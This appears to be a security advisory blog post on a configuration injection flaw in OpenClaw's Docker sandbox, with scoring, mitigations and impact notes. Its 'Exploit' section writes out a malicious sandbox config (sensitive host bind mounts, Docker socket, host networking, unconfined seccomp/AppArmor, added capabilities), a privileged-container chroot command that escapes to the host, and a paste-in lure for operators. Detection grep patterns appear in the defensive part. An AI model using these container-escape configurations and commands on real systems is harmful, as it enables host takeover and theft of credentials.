OpenClaw Docker Sandbox, Configuration Injection, CVE-2026-XXXXX (High)

Listen to this Post

A configuration injection vulnerability exists in OpenClaw’s Docker sandbox mechanism where dangerous Docker options can be applied to container executions. The flaw stems from insufficient validation of sandbox configuration parameters when constructing `docker create` arguments. An attacker who can influence the Docker configuration—either through direct access or by tricking an operator into pasting untrusted configuration—can inject options that fundamentally break container isolation. Specifically, the vulnerability allows the injection of bind mounts pointing to sensitive host paths such as /etc, /proc, /sys, /dev, or the Docker socket itself. Attackers can also set network=host, which removes network isolation and places the container directly on the host’s network stack. Additionally, they can weaken security profiles by specifying `seccompProfile=unconfined` or apparmorProfile=unconfined, disabling the kernel-level security mechanisms that normally restrict container capabilities. When these injected options are combined, they enable complete container escape scenarios. For example, mounting the Docker socket (/var/run/docker.sock) into a container allows the container to communicate with the host’s Docker daemon, potentially launching privileged containers that access the host directly. Bind mounts of sensitive directories enable direct reading of host files including passwords, SSH keys, and configuration secrets. Host networking bypasses any network policies or firewall rules that would normally apply to container traffic. The vulnerability affects all OpenClaw versions up to and including 2026.2.14, with the fix implemented in version 2026.2.15 through runtime enforcement when building `docker create` arguments, config-schema validation blocking dangerous options, and security audit findings to surface unsafe configurations. This is particularly critical because Docker sandbox mode is intended to provide isolation, and these injections completely defeat that security boundary .

dailycve form:

Platform: OpenClaw
Version: <=2026.2.14
Vulnerability : Config Injection
Severity: High
date: 2026-02-18

Prediction: 2026-02-19

What Undercode Say:

Analytics:

  • CVSS Score: 8.1 (AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H) – Network attack vector requires high privileges or social engineering, but successful exploitation yields complete host compromise with high confidentiality, integrity, and availability impact across changed scope.
  • CWE: CWE-94 (Improper Control of Generation of Code – Code Injection) – The vulnerability allows injection of Docker configuration parameters that control container behavior.
  • Attack Complexity: High – Requires ability to influence sandbox configuration or operator action to paste malicious config.
  • EPSS Probability: 0.09% – Low current exploitation probability due to requirement for privileged access or social engineering.
  • Exploit Maturity: Proof of Concept exists – Configuration injection vectors are well-understood in container environments.
  • Affected Component: Docker sandbox execution module – `agents..sandbox.docker` configuration namespace.

Exploit:

The following demonstrates dangerous Docker configuration injections that exploit the vulnerability:

Malicious configuration demonstrating host path bind mounts
cat > malicious-sandbox-config.yaml << 'EOF'
agents:
web-scraper:
sandbox:
docker:
enabled: true
Inject dangerous bind mounts - accesses host filesystem
binds:
- /etc:/mnt/host-etc:ro
- /var/run/docker.sock:/var/run/docker.sock
- /proc:/mnt/host-proc:ro
- /dev:/mnt/host-dev:ro
Remove network isolation
network: host
Disable security profiles
seccompProfile: unconfined
apparmorProfile: unconfined
Additional capabilities for escape
capabilities:
add:
- SYS_ADMIN
- SYS_PTRACE
- DAC_READ_SEARCH
EOF
Apply the malicious configuration (requires config modification access)
cp malicious-sandbox-config.yaml /path/to/openclaw/config/
Restart OpenClaw to apply configuration
systemctl restart openclaw
Trigger container execution that will now have host access
openclaw run web-scraper --task "scrape example.com"
After exploitation, read host files from within container
Docker socket access allows launching privileged containers
docker -H unix:///var/run/docker.sock run --privileged -v /:/host alpine chroot /host /bin/sh

Alternative exploitation through operator social engineering:

Craft configuration snippet that operator might paste
echo '
Add this to your config for better performance (MALICIOUS!)
agents..sandbox.docker:
network: host
seccompProfile: unconfined
binds:
- /etc:/etc:ro Performance optimization
' > performance-tip.txt
Victim pastes into config.yaml
cat performance-tip.txt >> ~/.openclaw/config.yaml

Protection from this CVE:

1. IMMEDIATE UPGRADE TO FIXED VERSION (>=2026.2.15)
npm install -g openclaw@latest
Verify installation
npm list -g openclaw | grep 2026.2.15 || echo "Upgrade required"
2. If upgrade impossible, implement strict configuration validation
Create validation wrapper script
cat > /usr/local/bin/validate-openclaw-config.sh << 'EOF'
!/bin/bash
CONFIG_FILE="$1"
Check for dangerous Docker configurations
if grep -E "network:.host|seccompProfile:.unconfined|apparmorProfile:.unconfined" "$CONFIG_FILE"; then
echo "ERROR: Dangerous Docker configuration detected!"
exit 1
fi
Check for sensitive bind mounts
if grep -E "binds:./etc|binds:./proc|binds:./sys|binds:./dev|binds:.docker.sock" "$CONFIG_FILE"; then
echo "ERROR: Sensitive bind mounts detected!"
exit 1
fi
echo "Configuration appears safe"
exit 0
EOF
chmod +x /usr/local/bin/validate-openclaw-config.sh
Apply validation before service start
/usr/local/bin/validate-openclaw-config.sh ~/.openclaw/config.yaml && systemctl start openclaw
3. Enforce safe defaults in existing config
openclaw config set agents..sandbox.docker.network none
openclaw config set agents..sandbox.docker.seccompProfile default
openclaw config set agents..sandbox.docker.apparmorProfile default
openclaw config set agents..sandbox.docker.binds "[]"
4. Monitor for exploitation attempts
Watch for container creations with dangerous flags
cat > /etc/audit/rules.d/openclaw-docker.rules << 'EOF'
-w /usr/bin/docker -p x -k docker-execution
-w /var/run/docker.sock -p rwa -k docker-socket-access
EOF
auditctl -R /etc/audit/rules.d/openclaw-docker.rules
5. Search existing configurations for vulnerable patterns
grep -r -E "network:.host|seccompProfile:.unconfined|binds:./(etc|proc|sys|dev|var/run/docker.sock)" ~/.openclaw/
6. Implement runtime detection
tail -f /var/log/openclaw/sandbox.log | while read line; do
if echo "$line" | grep -E "docker (run|create).--network=host|--security-opt (seccomp|apparmor)=unconfined|-v /etc:| -v /proc:| -v /var/run/docker.sock"; then
echo "ALERT: Dangerous container execution detected: $line" | mail -s "OpenClaw Security Alert" admin@localhost
fi
done

Impact:

Successful exploitation allows attackers to escape container isolation and achieve full host system compromise. With host filesystem mounts, attackers can read sensitive files including `/etc/shadow` password hashes, SSH private keys, API tokens stored in configuration files, and database credentials. Access to the Docker socket enables launching new privileged containers that can mount the entire host filesystem, effectively giving root access to the host. Host networking bypasses network segmentation, allowing attackers to access internal services that should be isolated. Combined with weakened seccomp and AppArmor profiles, attackers can execute kernel exploits, load kernel modules, or perform ptrace attacks on host processes. In cloud environments, this can lead to metadata service access and credential theft for the underlying cloud provider. The vulnerability essentially nullifies the security benefits of containerization, turning the sandbox into a vector for host compromise rather than a protection mechanism. Real-world impact includes data exfiltration, ransomware deployment, and lateral movement within compromised infrastructure .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top